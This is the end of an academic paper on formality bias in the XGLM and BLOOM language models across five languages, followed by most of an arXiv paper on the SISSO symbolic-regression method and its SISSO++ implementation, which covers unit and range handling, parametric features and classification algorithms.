**French** & **Spanish** \\ & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** & **F\(\rightarrow\)F\%** / \(\rightarrow\)I\%** \\ \hline XGLM(2.9B) & 89.4\% / 61.1\% & 79.8\% / **100.0\%*** & 34.0\% / 94.0\% & 26.7\% / 59.5\% & 85.9\% / 80.2\% \\ BLOOM(3B) & 94.2\% / 55.1\% & 83.7\% / 87.1\% & 29.2\% / 91.7\% & 32.0\% / **82.0\%*** & 77.8\% / 90.4\% \\ \hline XGLM(7.5B) & 88.6\% / **76.7\%*** & 75.5\% / 98.8\% & 34.4\% / 84.7\% & **54.0\%*** / 75.6\% & 86.9\% / 75.8\% \\ BLOOM(7.1B) & 93.5\% / 51.1\% & 74.0\% / 91.9\% & 27.6\% / **94.0\%*** & 25.8\% / 66.7\% & 83.8\% / **96.8\%*** \\ \hline \hline \end{tabular} \end{table} Table 5: Formality preservation samples’ percentages for **Formal / Informal** prompts (800 prompts per language: 400 formal and 400 informal). Each sample is annotated as either formal, informal, or incohesive and the percentages are calculated without incohesive text counts. Bolded values show that the corresponding model is significantly better according to a permutation-based statistical test with a p-value of 5% or less. glish native speakers in requests, even among close friends, while in Arabic, it could be considered awkward, if not rude, in conversations among close friends (Hovy and Yang, 2021). A usage example of language models is solving downstream tasks using prompting techniques for zero-shot learning, such as (Zhong et al., 2021)'s work on question-answering. Prompting has also been used to utilize large language models for conversational chatbots such as ChatGPT (Ouyang et al., 2022). As prompting is becoming popular, we must understand that prompting a model that exhibits formality bias could be a barrier to getting the expected output. Furthermore, depending on the application, formality bias could even lead to sometimes unwanted misunderstandings (Hershcovich et al., 2022) and conflicts if the models, for example, are not able to generate text in the formality style of the users' expectations. Controlling LLMs generations has been taken into consideration in recent work, such as (Ouyang et al., 2022), which fine-tuned a language model (Brown et al., 2020) intending to align the model with the intent of the users using reinforcement learning from human feedback (RLHF) (Christiano et al., 2017; Stiennon et al., 2020). Future work could analyze the impact of RLHF on the formality distributions present in language models. Furthermore, our work focused only on two pre-trained models with up to 7B parameters. The same analysis could be conducted for larger models such as GPT-3 and BLOOM(175B). Finally, the increase in the number of multilingual language models calls for more work on the bias analysis of multilingual language models. ## 7 Conclusion In conclusion, we analyzed the formality level of the generations of two large-scale generative language models, XGLM and BLOOM, ranging from 2B parameters to 7B parameters. We first observed the cohesiveness of the predictions. We found that BLOOM(7.1B) predicts significantly more cohesive text than XGLM(7.5B) for English, French, and Spanish. Second, we showed that, across all five languages, both models tend to generate formal text when prompted neutrally. Finally, we found that the formality of the prompt highly impacts both models. In most cases, they generate the same style as the prompt, with slight differences between the models depending on the language. Our analysis is based on the annotations of 1,200 generations in Arabic, Bengali, English, French, and Spanish. We release them with this paper opening future avenues for modeling the formality of generative multilingual language models. ## 8 Acknowledgment We thank the Fatima Fellowship5 and Hugging Face for organizing and sponsoring the Fatima Research Fellowship program. Footnote 5: cf. [https://www.fatimafellowship.com/](https://www.fatimafellowship.com/)
2305.01242
Recent advances in the SISSO method and their implementation in the SISSO++ code
Accurate and explainable artificial-intelligence (AI) models are promising tools for the acceleration of the discovery of new materials, ore new applications for existing materials. Recently, symbolic regression has become an increasingly popular tool for explainable AI because it yields models that are relatively simple analytical descriptions of target properties. Due to its deterministic nature, the sure-independence screening and sparsifying operator (SISSO) method is a particularly promising approach for this application. Here we describe the new advancements of the SISSO algorithm, as implemented into SISSO++, a C++ code with Python bindings. We introduce a new representation of the mathematical expressions found by SISSO. This is a first step towards introducing ``grammar'' rules into the feature creation step. Importantly, by introducing a controlled non-linear optimization to the feature creation step we expand the range of possible descriptors found by the methodology. Finally, we introduce refinements to the solver algorithms for both regression and classification, that drastically increase the reliability and efficiency of SISSO. For all of these improvements to the basic SISSO algorithm, we not only illustrate their potential impact, but also fully detail how they operate both mathematically and computationally.
Thomas A. R. Purcell, Matthias Scheffler, Luca M. Ghiringhelli
2023-05-02T08:00:28Z
http://arxiv.org/abs/2305.01242v1
# Recent advances in the SISSO method and their implementation in the SISSO++ code ###### Abstract Accurate and explainable artificial-intelligence (AI) models are promising tools for the acceleration of the discovery of new materials, ore new applications for existing materials. Recently, symbolic regression has become an increasingly popular tool for explainable AI because it yields models that are relatively simple analytical descriptions of target properties. Due to its deterministic nature, the sure-independence screening and sparsifying operator (SISSO) method is a particularly promising approach for this application. Here we describe the new advancements of the SISSO algorithm, as implemented into SISSO++, a C++ code with Python bindings. We introduce a new representation of the mathematical expressions found by SISSO. This is a first step towards introducing "grammar" rules into the feature creation step. Importantly, by introducing a controlled non-linear optimization to the feature creation step we expand the range of possible descriptors found by the methodology. Finally, we introduce refinements to the solver algorithms for both regression and classification, that drastically increase the reliability and efficiency of SISSO. For all of these improvements to the basic SISSO algorithm, we not only illustrate their potential impact, but also fully detail how they operate both mathematically and computationally. ## I Introduction Data-centric and artificial intelligence (AI) approaches are becoming a vital tool for describing physical and chemical properties and processes. The key advantage of AI is its ability to find correlations between different sets of properties without the need to know which ones are important before the analysis. Because of this, AI has become increasingly popular for materials discovery applications with uses in areas such as thermal transport properties [1; 2], catalysis [3; 4; 5], phase stability [6], and quantum materials [7]. Despite the success of these methodologies, creating explainable and physically relevant AI models remains an open challenge in the field [8; 9; 10]. One prevalent set of methods for explainable AI is symbolic regression [11; 12; 13; 14]. Symbolic regression algorithms identify the optimal non-linear, analytic expressions for a given target property from a set of input features, i.e., the _primary features_, that are possibly related to the target [15]. Originally, (stochastic) genetic-programming-based approaches were and still are used to find these expressions [15; 16; 17; 18], but recently a more diverse set of solvers have been developed [19; 20; 21; 22; 23; 24]. The sure-independence screening and sparsifying operator (SISSO) approach combines symbolic regression with compressed sensing [25; 26; 27; 28], to provide a deterministic way of finding these analytic expressions. This approach has been used to describe numerous properties including phase stability [6; 29; 26], catalysis [30], and glass transition temperatures [31]. It has also been used in a multi-task [25] and hierarchical fashion [28]. The SISSO approach starts with a collection of primary features and mathematical unary and binary operators (e.g., addition, multiplication, \(n\)th root, logarithms, etc.). The first step is the _feature-creation_ step, where a pool of _generated features_, is built by exhaustively applying the set of mathematical operators to the primary features. The algorithm is iteratively repeated by applying the set of operators to the primary features or the generated features created at the previous step. The number of iterations in this feature-creation step is called the rung. The subsequent step is _descriptor identification_, i.e., compressed sensing is used to identify the best \(n\)-dimensional linear model by performing an \(\ell_{0}\)-regularized optimization on a subspace \(\mathcal{S}\) of all generated expressions. \(\mathcal{S}\) is selected using sure-independence screening [32], with a suitable projection score, depending on whether one is solving a regression or classification problem (see below). For a regression problem this will rank all generated features according to their Pearson correlation values and select only the most correlated features, essentially performing a one-dimensional \(\ell_{0}\)-regularized linear regression on all features. The result of the SISSO analysis is a \(n-\)dimensional descriptor, which is a vector with components from \(\mathcal{S}\). For a regression problem, the SISSO model is the scalar product of the identified descriptor with the vector of linear coefficients resulting from the \(\ell_{0}\)-regularized linear regression. For a classification problem, the model is given as a set of hyperplanes that divide the points into classes, that are described by the scalar product of the identified descriptor, with a set of coefficients found by linear support vector machines (SVM). Here, we introduce the new concepts implemented in the recently released SISSO++ code [27] and detail their implementation. Beyond creating a modular interface to run SISSO, SISSO++ also improves upon the algorithms in several aspects, for both the feature creation and descriptor identification steps. The most important advancement of the code is expressing the features as binary expression trees, instead of strings, allowing us to recursively define all aspects of the generated expressions from the primary features. With this implementation choice, we are able to create a complete description of the units for each generated feature, as well as an initial representation of its domain and range. This allows for the creation of grammatically correct expressions, in terms of consistency of the physical units, and the control of numerical issues generated by features going out of their physically meaningful range. In terms of the feature-creation step, we also discuss the implementation of _Parameteric SISSO_, which introduces the flexibility of non-linear parameters together with the operators that are optimized against a loss function based on the compressed-sensing-based feature selection metrics. This procedure was used to describe the thermal conductivity of a material in a recent publication [33]. For the descriptor-identification step, we cover two components: an improved classification algorithm and the multi-residual approach. For classification problems, we generalized the algorithm to work for any problem to an arbitrary dimension, and explicitly include a model identification via linear SVM. The multi-residual approach, which was previously used in Ref. [28], introduces further flexibility for the identification of models with more than one dimension. Here, we provide a in-depth discussion of its machinery. ## II Feature Creation ### Binary-Expression-Tree Representation of Features The biggest advancement of the implementation of SISSO in SISSO++, compared to the original implementation in Ref. [26], is its modified representation of the features as binary expression trees, instead of strings. This representation is illustrated in Figure 1 and easily allows for all aspects of the generated features to be recursively calculated on the fly from the data stored in the primary features. For certain applications, it is also possible to store the data of higher-rung features, to reduce the overall computational cost of the calculations. The individual features are addressed by the root node of the binary expression tree, and stored in the code as a shared_ptr from the C++ standard library. This representation reduces the overall memory footprint of each calculation, as the individual features only need to be created once and only copies of shared pointers need to be stored for each new expression. The remainder of this section will be used to describe the various aspects of the new representation including a description of the units and range of the features, as well as how it is used to generate the feature space. #### ii.1.1 Units An important upgrade in SISSO++ is its generalized and exact treatment of units for the expressions. In physics, dimensional analysis is an important tool when generating physically meaningful expressions, and it is necessary to include it when using symbolic regression for scientific problems. We introduced this into SISSO++ by determining the units for each new expression from the primary features, and explicitly checking to ensure that a new expression is physically possible. Within the code the Units are implemented as dictionaries with the key representing the base unit and the value representing the exponent for each key, e.g., \(\mathrm{m/s^{2}}\) would be stored as \(\left\{\mathrm{m:1,s:-2}\right\}\). Functions exist to transform the Units to and from strings to more easily represent the information. We then implemented a multiplication, division, and power functions for these specialized dictionaries, allowing for the units of the generated features to be derived recursively following the rules in Table 1. An important caveat is that the current implementation can not convert between two units for the same physical quantity units, e.g. between nanometers, picometers, and Bohr radii. Using this implementation of units, a minimal treatment of dimensional analysis can be performed in the code. The dimensional analysis focuses on whether the units are consistent within each expression and for the final model. For the final model, this check is used to Figure 1: A demonstration of the new representation of the features in the SISSO++ code. The feature is stored as the root of the tree (represented by the thick border), the primary features are the leaves, and the rung corresponds to the height of the tree, i.e. the longest path between each leaf and the root. The unit, range, expressions, and values of the features are necessarily stored only for the primary features, with them defined recursively for all generated expressions. determine the units of the fitted constants in the linear models at the end, which can take arbitrary units, and therefore can do any unit conversion natively. The restrictions, used to reject expressions by dimensional analysis, are outlined in Table 2, and can be summarized as only allowing addition and subtraction to act on features of the same units, and all transcendental operations must act on a unitless quantity. With these two restrictions in place, only physically possible features can be found, and the choice of units should no longer affect which features are selected. If one wants to allow for non-physical expressions to be found, this can be achieved by providing all input primary features with no units associated to them. #### ii.1.2 Range Another important advancement of the feature-creation step is the introduction of ranges for the primary features, which act as a domain for future operations during feature creation. One of the challenges associated with symbolic regression, especially with smaller datasets, is that the selected expressions can sometimes contain discontinuities that are outside of the training data, but still within the relevant input space for a given problem. For example, this can lead to an expression taking the logarithm of a negative number, resulting in an undefined prediction. SISSO++ solves this problem by including an option for describing the range of a primary feature in standard mathematical notation, e.g. \(\left[0,\infty\right),\) and then using that to calculate the range for all generated formulas using that primary feature, following the rule specified in Table 3. In the code, the ranges are referenced as the Domain because the range for a feature of rung \(n-1\) is the domain for a possible expression of rung \(n\) that is using that feature. While all ranges in Table 3 assume inclusive endpoints, the implementation can handle both exclusive endpoints and a list of values explicitly excluded from the range, e.g., point discontinuities inside the primary features themselves. Table 4 lists the cases where the range of a feature is used to prevent a new expression from being generated. In all cases, this prevents an operation from occurring where a mathematical operation would be not defined, such as taking the square-root of a negative number. In cases where the range of values for a primary feature is not defined, then these checks are not performed and the original assumption that all operations are safe is used. ### Parametric Sisso Parametric SISSO extends the feature creation step of SISSO to automatically include scale and bias terms for each operation, as used in Purcell _et al._[33]. For a general operator, \(\hat{h}\left(\mathbf{x}\right)\in\hat{\mathcal{H}}\), with a set of scale and bias parameters, \(\hat{\mathcal{P}}\), the parameterization scheme updates the operator to be, \[\hat{h}\left(\mathbf{x}\right)\rightarrow\hat{h}^{\hat{\mathcal{P}}}\left( \alpha_{1}\mathbf{x}+\beta_{1}\right), \tag{1}\] \begin{table} \begin{tabular}{l l} \hline Operation & \multicolumn{1}{l}{Unit Restriction} \\ \hline \(A+B\) & Unit(A) == Unit(B) \\ \(A-B\) & Unit(A) == Unit(B) \\ \(\left|A-B\right|\) & Unit(A) == Unit(B) \\ \(\sin\left(A\right)\) & Unit(A) == \(\equiv\emptyset\) \\ \(\cos\left(A\right)\) & Unit(A) == \(\emptyset\) \\ \(\exp\left(A\right)\) & Unit(A) == \(\emptyset\) \\ \(\exp\left(-A\right)\) & Unit(A) == \(\emptyset\) \\ \(\log\left(A\right)\) & Unit(A) == \(\emptyset\) \\ \hline \hline \end{tabular} \end{table} Table 2: Restrictions for each unit, if an operation is not listed there are no restrictions. \begin{table} \begin{tabular}{l l} \hline Operation & Resulting Unit \\ \hline \(A+B\) & Unit(A) \\ \(A-B\) & Unit(A) \\ \(A\left(B\right)\) & Unit(A) * Unit(B) \\ \(A/B\) & Unit(A) / Unit(B) \\ \(\left|A-B\right|\) & Unit(A) \\ \(\left|A\right|\) & Unit(A) \\ \(\sin\left(A\right)\) & Unitless \\ \(\cos\left(A\right)\) & Unitless \\ \(\exp\left(A\right)\) & Unitless \\ \(\exp\left(-A\right)\) & Unitless \\ \(\log\left(A\right)\) & Unitless \\ \((A)^{-1}\) & Unit(A)\({}^{-1}\) \\ \((A)^{2}\) & Unit(A)\({}^{2}\) \\ \((A)^{3}\) & Unit(A)\({}^{3}\) \\ \((A)^{6}\) & Unit(A)\({}^{6}\) \\ \(\sqrt{A}\) & Unit(A)\({}^{1/2}\) \\ \(\sqrt{A}\) & Unit(A)\({}^{1/3}\) \\ \hline \hline \end{tabular} \end{table} Table 1: How the units are calculated for each operation Figure 2: A graphical representation of the effect of the parameterization depth. If \(P_{d}=1\) then only the \(\sin\) operator gets parameterized, while if \(P_{d}=2\) both operations are parameterized where \(\alpha_{1}\) is the scale parameter, \(\beta_{1}\) is the bias term, and \(\mathbf{x}\) is a vector containing all input data. These new operators can then be used to create a new feature, \(\hat{\phi}^{\mathcal{P}}\left(\mathbf{x}\right)\), as is normally done in SISSO, where each feature has its own set of parameters. However, this does introduce a new hyperparameter for the feature creation step, the parameterization depth, \(P_{d}\), which defines the level at which the parameterization occurs in the binary expression tree. This is best described in Figure 2, where \(P_{d}\) controls which operations are included in the parameterization. In this example, if \(\beta_{2}\) was previously set by another optimization and \(P_{d}=2\), then that previous value will be ignored for this feature only; however, if \(P_{d}=1\), then the existing \(\beta_{2}\) will be preserved. In order to avoid linear dependencies between different operations and the constants set during linear regression, some of the scale and bias terms are set to one and zero, respectively, for a summary of this for all operators see Table 5. It is important to note that for the log operator, \(\alpha\) is always set to \(\pm 1\) to avoid linear dependencies with other parameters. Although this does leave a unit dependency, it can be removed with \[\ln\left(x+\beta\right)\rightarrow\ln\left(\alpha_{\text{unit}}\left(x+\beta \right)\right)-\ln\left(\alpha_{\text{unit}}\right), \tag{2}\] where \(\alpha_{\text{unit}}\) is the unit conversion factor. Once \(\hat{\phi}^{\mathcal{P}}\left(\mathbf{x}\right)\) is defined, all parameters \(\hat{p}\in\hat{\mathcal{P}}\) are optimized using the non-linear optimization library NLopt [34]. \begin{table} \begin{tabular}{l l} \hline Operation & Parameterized Operation \\ \hline \(A+B\) & \(A+\alpha B\) \\ \(A-B\) & \(A-\alpha B\) \\ \(A\left(B\right)\) & \(A\left(B+\beta\right)\) \\ \(A/B\) & \(A/\left(B+\beta\right)\) \\ \(\left|A-B\right|\) & \(\left|A-\left(\alpha B+\beta\right)\right|\) \\ \(\left|A\right|\) & \(\left|A+\beta\right|\) \\ \(\sin\left(A\right)\) & \(\sin\left(\alpha A+\beta\right)\) \\ \(\cos\left(A\right)\) & \(\cos\left(\alpha A+\beta\right)\) \\ \(\exp\left(A\right)\) & \(\exp\left(\alpha A\right)\)1 \\ \(\exp\left(-A\right)\) & \(\exp\left(-\alpha A\right)\)2 \\ \(\log\left(A\right)\) & \(\log\left(A+\beta\right)\)3 \\ \((A)^{-1}\) & \((A+\beta)\)4 \\ \((A)^{2}\) & \((A+\beta)\)5 \\ \((A)^{3}\) & \((A+\beta)\)6 \\ \((A)^{3}\) & \(\left[\left(\min\left(A\right)\right)^{3},\left(\max\left(A\right)\right)^{3}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(|A|\) & \(\left[\max\left(0,\min\left(A\right)\right),\max\left(\left|\max\left(A\right) \right|,\left|\min\left(A\right)\right|\right)\right]\) \\ \((A)^{2}\) & \(\left[\max\left(0,\min\left(A\right)\right)^{2},\max\left(\left|\max\left(A \right)\right|,\left|\min\left(A\right)\right|\right)^{2}\right]\) \\ \((A)^{6}\) & \(\left[\max\left(0,\min\left(A\right)\right)^{6},\max\left(\left|\max\left(A \right)\right|,\left|\min\left(A\right)\right|\right)^{6}\right]\) \\ \(|A-B|\) & \(\left[\max\left(0,\min\left(A\right)-\max\left(B\right)\right)\right],\left|\min \left(\max\left(A\right)-\min\left(B\right)\right)\right]\) \\ \hline \hline \end{tabular} \end{table} Table 4: Domain restrictions for each operation, if an operation is not listed there are no restrictions. \begin{table} \begin{tabular}{l l} \hline Operation & Domain Restriction \\ \hline \(A/B\) & \(0\notin\) Range (B) \\ \((A)^{-1}\) & \(0\notin\) Range (A) \\ \(\log\left(A\right)\) & \(\min\left(\text{Range}\left(A\right)\right)>0\) \\ \(\sqrt{A}\) & \(\min\left(\text{Range}\left(A\right)\right)\geq 0\) \\ \hline \hline \end{tabular} \end{table} Table 3: How the range for each operation is calculated \begin{table} \begin{tabular}{l l} \hline Operation & Resulting Range \\ \hline \(A+B\) & \(\left[\min\left(A\right)+\min\left(B\right),\max\left(A\right)+\max\left(B\right)\right]\) \\ \(A-B\) & \(\left[\min\left(A\right)-\max\left(B\right),\max\left(A\right)-\min\left(B\right)\right]\) \\ \(A\left(B\right)\) & \(\left[\min\left(\min\left(A\right)*\min\left(B\right),\min\left(A\right)*\max \left(B\right),\max\left(A\right)*\min\left(B\right),\max\left(A\right)*\max \left(B\right)\right),\right.\) \\ & \(\max\left(\min\left(A\right)*\min\left(B\right),\min\left(A\right)*\max \left(B\right),\max\left(A\right)*\min\left(B\right),\max\left(A\right)*\max \left(B\right)\right)\right]\) \\ \(A/B\) & \(\left[\text{Range}\left(A\right)*\text{Range}\left(B^{-1}\right)\right]\) \\ \(\sin\left(A\right)\) & \(\left[-1,1\right]\) \\ \(\cos\left(A\right)\) & \(\left[-1,1\right]\) \\ \(\exp\left(A\right)\) & \(\left[\exp\left(\min\left(A\right)\right)\right),\exp\left(\max\left(A\right)\right)\)] \\ \(\exp\left(-A\right)\) & \(\left[\exp\left(-\max\left(A\right)\right),\exp\left(-\min\left(A\right)\right)\right]\) \\ \(\log\left(A\right)\) & \(\left[\log\left(\min\left(A\right)\right),\log\left(\max\left(A\right)\right)\right]\) \\ \((A)^{-1}\) & if\(\left(0\in\) Range (A)\right)\): \\ & \(\left(-\infty,0\right)\cup\left(0,\infty\right)\) \\ & else: \\ & \(\left[\left(\max\left(A\right)\right)^{-1},\left(\min\left(A\right)\right)^{-1}\right]\) \\ \((A)^{3}\) & \(\left[\left(\min\left(A\right)\right)^{3},\left(\max\left(A\right)\right)\right]^{3}\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(\sqrt{A}\) & \(\left[\sqrt{\min\left(A\right)},\sqrt{\max\left(A\right)}\right]\) \\ \(|A|\) & \(\left[\max\left(0,\min\left(A\right)\right),\max\left(\left|\max\left(A\right)\right|, \left|\min\left(A\right)\right|\right)]\) \\ \((A)^{2}\) & \(\left[\max\left(0,\min\left(A\right)\right)^{2},\max\left(\left|\max\left(A\right) \right|,\left|\min\left(A\right)\right|\right)^{2}]\) \\ \((A)^{6}\) & \(\left[\max\left We use the Cauchy loss function as the objective for the optimization \[\min_{\hat{\mathcal{P}}}f\left(\mathbf{P},\hat{\phi}^{\hat{\mathcal{P }}}\right) \tag{3a}\] \[f\left(\mathbf{P},\hat{\phi}^{\hat{\mathcal{P}}}\right)=\sum_{i}^ {n_{\text{ramp}}}\frac{c^{2}}{n_{\text{ramp}}}\log\left(1+\left(\frac{P_{i}- \hat{\phi}^{\hat{\mathcal{P}}}\left(\mathbf{x}_{i}\right)}{c}\right)^{2} \right), \tag{3b}\] where \(\mathbf{P}\) is a property vector, \(c\) is a scaling factor set to 0.5 for all calculations and \(n_{\text{ramp}}\) is the number of samples. We chose to use the Cauchy loss function over the mean square error to make the non-linear optimization more robust against outliers in the dataset. Because Equation 3b is not scale or bias invariant, additional external parameters \(\alpha_{ext}\) and \(\beta_{ext}\) are introduced to respectively account for these effects. For the case of multi-task SISSO [25], each task has its own external bias and scale parameters to account for the individual linear regression solutions. As an example for the feature illustrated in Figure 2 (\(P_{d}=2\)), the function that is optimized would be \[\hat{\phi}^{\hat{\mathcal{P}}}\left(\mathbf{x}\right)=\alpha_{ext}\sin\left( \alpha_{1}\frac{x_{1}}{x_{2}+\beta_{2}}+\beta_{1}\right)+\beta_{ext}. \tag{4}\] To initialize the parameters in \(\hat{\mathcal{P}}\), we set all internal \(\alpha\) and \(\beta\) terms are set to 1.0 and 0.0, respectively, and \(\alpha_{ext}\) and \(\beta_{ext}\) are set to the solution of the least squares regression problem for each task. In some cases, \(\beta\) can be set to a non-zero value if leaving it at zero would include values outside the Domain of the operator. In these cases, \(\beta\) is set to \(\min\left(\mathbf{x}\right)+10^{-10}\). Each optimization follows a two or three step process outlined here. First a local optimization is performed to find the local minimum associated with the initial parameters. Once at a local minimum an optional global optimization is performed to find any minima that are better than the one initially found. For these first two steps the parameters are optimized to a relative tolerance of \(10^{-3}\) and \(10^{-2}\) respectively, with a maximum of five thousand function evaluations. Finally, a more accurate local optimization is done to a relative tolerance of \(10^{-6}\) to find the best parameter set. For this final optimization, ten thousand function evaluations are allowed. Additionally, for both the initial and global optimization steps, the parameters are bounded to be in a range between -100 and 100 to improve the efficiency of the optimization, but this restriction is removed for the final optimization. For all local optimizations, the subplex algorithm [35], a faster and more robust variant of the Nelder-Mead Simplex method [36], is used. The Figure 3: A comparison of the expressions found non-parametric (a, c, and e) and parametric SISSO (b, d, and f) for a Lorentzian (a, b, e, and f) and sin (c, d) function. Blue dots represent the training data, and the red line represents the expressions found by SISSO. The parameterization scheme either finds the correct (b and d) or better model (f) than the non-parametric functions, even when the high noise or bad initial guess of the parameters leads to a non-optimized solution. Improved Stochastic Ranking Evolution Strategy algorithm [37] is used for all global optimizations. Once optimized, only the internal \(\alpha\) and \(\beta\) parameters are stored in \(\tilde{\mathcal{P}}\). Figure 3 illustrates the power of the new parameterization scheme. For both toy problems represented by analytic Lorentzian and sin functions with some white noise, the non-parametric version of SISSO can not find accurate models for the equations as it can not address the non-linearities properly. By using this new parameterization scheme, SISSO is now able to accurately find the models as shown in Figure 3c and d. However, it is important to note that the more powerful featurization comes at the cost of a significantly increased time to generate the feature space, as the parameterization becomes the bottleneck for the calculations. Additionally, there can be cases where the parameterization scheme does not find an optimal solution because of too much noise or the optimal parameters being too far away from the initial guesses, as shown in Figure 3e and f. ### Building the Complete Feature Set With all of the new aspects of the feature representation in place, SISSO++ has a fully parallelized feature set construction that uses a combination of threads and MPI ranks, for efficient feature set construction. The basic process of creating new features is illustrated in Figure 4, where each new rung builds on top of existing features by adding a new operation on top of existing binary expression trees for the previous rung. Throughout this process all checks are done to ensure that the units are correct and the domains for each new operation are respected. Additionally, the code checks for invalid values, e.g., NaN or inf, and some basic simplifications for all features, e.g., features like \(\frac{\text{inf}}{\omega}\) are rejected. The operators are separated into parameterized and non-parameterized versions of each other to allow for the optional use of the parametric SISSO concepts. Figure 4: Illustration of how the feature space of SISSO is created. In this example the user selects two primary features \(\omega\) (purple) and \(t\) (orange) and three operators sin (blue), multiplication (green), and division (red). SISSO then builds up a more complicated expression space by applying the operations onto the existing features by increasing the height of the binary expression trees. Throughout this process the units and ranges of each of the operations are respected. ## III Descriptor identification ### Linear Programming Implementation for Classification Problems One of the largest updates to the SISSO methodology is the new, generalized approach for solving classification problems. In previous implementations, when finding a classification scheme, SISSO would explicitly build the convex hull, and then calculate the number of points inside the overlap region between different classes and either the normalized overlap volume or separation distance to find the optimal solution. While this works for two dimensions, finding the overlap volume or separation distance becomes intractable for three or more dimensions, and even defining the convex hull becomes intractable for four or more dimensional classification. SISSO++ replaces these conditions with an algorithm that determines the number of points inside the convex hull overlap region using linear programming, and explicitly creates a model using linear SVM. The linear programming algorithm checks for the feasibility of \[\min 0 \tag{5}\] \[\text{s.t.}\sum_{i\in I}^{\min}\alpha_{i}x_{i}=x_{j},\quad\sum_{i \in I}\alpha_{i}=1,\quad\alpha_{i}\geq 0,\ \forall i\in I, \tag{6}\] where \(x_{i}\) is the \(i^{th}\) point inside the set of all points of a class \(I\), \(\alpha_{i}\) is the coefficient for \(x_{i}\), and \(x_{j}\) is the point to check if it is inside the convex hull. The above problem is only feasible if and only if \(x_{j}\) lies inside the set of points, \(I\), representing a class in the problem. Here we are optimizing a zero function because the actual solution to this optimization does not matter, only that such a solution can be found, i.e. the constraints can be fulfilled, is important. The feasibility and linear programming problem is defined using the Coin-CLP library [38]. Once the number of points in the overlap region is determined, a linear SVM model is calculated for the best candidates, and used as the new tie-breaking procedure. The first tiebreaker is the number of misclassified points by the SVM model and the second one is the margin distance. The SVM model is calculated using libsvm [39]. Figure 5 demonstrates the capabilities of the new classification algorithm. In this problem, we randomly sample a Gaussian distribution with a standard deviation of 0.5 and centered at the origin to generate one thousand samples for three features, \(x_{0}\), \(x_{1}\), and \(x_{2}\). These three features and the copied and relabeled to \(x_{3}\), \(x_{4}\), and \(x_{5}\) The samples are then separated into two classes based on if \((x_{1}+x_{2}+x_{3})\) is greater than (light blue) or less than (red) zero. For \(x_{0}\), \(x_{1}\), and \(x_{2}\) we move all points where \(|x_{1}+x_{2}+x_{3}|<0.4\) to a random point further away from the dividing plane within each of their classes to ensure a noticeable margin of separation. For simplicity, we use only the six primary features shown on the axes of Figure 5a and b with no generated expressions; however, the rung 2 feature of \((x_{0}+x_{1})+x_{2}\) would be able to completely separate the classes in one dimension. Using the updated algorithm SISSO can now easily identify that the set \(\{x_{0},x_{1},x_{2}\}\) is the better classifier than the set \(\{x_{3},x_{4},x_{5}\}\) as the tiebreakers are defined for all dimensions and not just the first two. More importantly, SISSO can now provide the \(n\)-dimensional dividing plane found by linear-SVM creating an actual classifier automatically here shown by the green plane. It is important to note that the same procedure can be done to an arbitrary dimension, but visualization becomes impractical above three. Figure 5: A demonstration of the classification algorithm. A set of 1000 points of three features, \(x_{0}\), \(x_{1}\), and \(x_{2}\), are sampled from a Gaussian distribution with a standard deviation of 0.5 and centered at the origin. The set is separated into 2 classes (the red and light blue circles) by the plane \(x_{0}+x_{1}+x_{2}=0\) (green surface). a) All points where \(|x_{1}+x_{2}+x_{3}|<0.4\) are moved to a random point from that has a distance of 0.2\(\sqrt{2}\) to 0.35\(\sqrt{2}\) from the plane within each of their own classes, and b) the original data stored as \(x_{3}\), \(x_{4}\), and \(x_{5}\). The updated classification algorithm correctly determines that \(x_{0}\), \(x_{1}\), and \(x_{2}\) is the superior classifier, while for the original definitions of only the convex overlap region for three and more dimensions they would be considered equally good. The projections are shown with an elevation angle of 7.5 degrees and an azimuthal angle of 145 deg. ### Multiple Residuals The second advancement to the descriptor-identification step of the SISSO algorithm is the introduction of a _multiple-residuals_ approach to select the expressions (features) for models with a dimension higher than one. In the original SISSO algorithm [40], the residual of the previously found model, \(\vec{\Delta}_{D-1}^{0}\), i.e., the difference between the vector storing the values of the property for each sample, \(\vec{P}\), and the estimates predicted by the \((D-1)\)-dimensional model (\(\vec{\Delta}_{D-1}^{0}=\vec{P}_{D-1}-\vec{P}\)), is used to calculate the projection score of the candidate features during the SIS step for the best \(D\)-dimensional model, \(s_{j}^{0}=R^{2}\left(\vec{\Delta}_{D-1}^{0},\vec{d}_{j}\right)\). Here, \(R\) is the Pearson correlation coefficient, representing a regression problem, and \(j\) corresponds to each expression generated during the feature-creation step of SISSO. In SISSO++ [27], we extend the residual definition and use the best \(r\) residuals to calculate the projection score: \(\max\left(s_{j}^{0},s_{j}^{1},\ldots,s_{j}^{r-1}\right)\). The multiple-residual concept generalizes the descriptor identification step of SISSO, by using information from an ensemble of models to determine which features to add to the selected subspace. The value of \(r\) for a calculation is set as any hyperparmeter via cross-validation This process is illustrated in Fig. 6 for a three-dimensional problem space (three training samples) defined by \(\mathbf{e_{1}}\), \(\mathbf{e_{2}}\), and \(\mathbf{e_{3}}\) with five candidate features \(\mathbf{F_{1}},\cdots,\mathbf{F_{5}}\) to describe the property \(\mathbf{P}\). In principle, there can be an arbitrary number of feature vectors, but for clarity we only show five. If only a single residual is used, then the selected two dimensional model will comprise of \(\mathbf{F_{1}}\) and \(\mathbf{F_{4}}\), as \(\mathbf{F_{3}}\) is never selected because it has the smallest projection score from the residual of the model found using \(F_{1}\). However, because \(\mathbf{F_{2}}\) has a component along \(\mathbf{e_{2}}\), a better two-dimensional model consisting of a linear combination of \(\mathbf{F_{2}}\) and \(\mathbf{F_{3}}\) exists, despite \(\mathbf{F_{2}}\) not being the most correlated feature to \(\mathbf{P}\). When going to higher dimensional feature spaces, it becomes more likely that the feature vectors similarly correlated to the property contain orthogonal information, thus the need for using multiple residuals in SISSO. In order to demonstrate the effect of learning over multiple residuals and get an estimate of the optimal number of residuals and size of the SIS subspace (\(n_{\text{sis}}\)), we plot the training RMSE for the two dimensional models for the 